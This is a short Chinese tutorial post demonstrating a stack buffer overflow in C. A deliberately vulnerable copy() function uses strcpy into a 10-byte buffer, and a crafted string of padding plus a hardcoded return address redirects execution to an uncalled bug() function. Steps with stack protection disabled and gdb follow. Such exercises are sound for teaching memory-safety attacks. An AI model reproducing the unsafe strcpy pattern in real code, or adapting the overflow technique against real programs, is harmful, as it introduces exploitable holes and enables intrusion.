攻击代码:
#include "stdio.h"
#include "string.h"
char code[]=
"\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41"
"\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41" // two more added
"\xbe\x05\x40\x00" // bug address
"\x00";
void copy(const char *input)
{
char buf[10];
strcpy(buf,input);
printf("%s \n",buf);
}
void bug(void)
{
printf("I shouldn’t have appeared\n");
}
int main(int argc,char *argv[])
{
copy(code);
return 0;
}攻击过程:
1 关闭栈保护编译打开gdb:
2 在strcpy和printf两行都设置断点,运行,查看rsp寄存器的值,找到strcpy所在的地址。
3 运行后查看,此时变为了bug的地址。
4 运行程序,达到攻击目的
参考资料:
http://os.it168.com/a2009/0530/1059/000001059910.shtml
http://blog.csdn.net/liigo/article/details/582231
http://blog.163.com/jw_chen_cs/blog/static/20221214820124119642246/
原文:http://my.oschina.net/u/2348884/blog/407060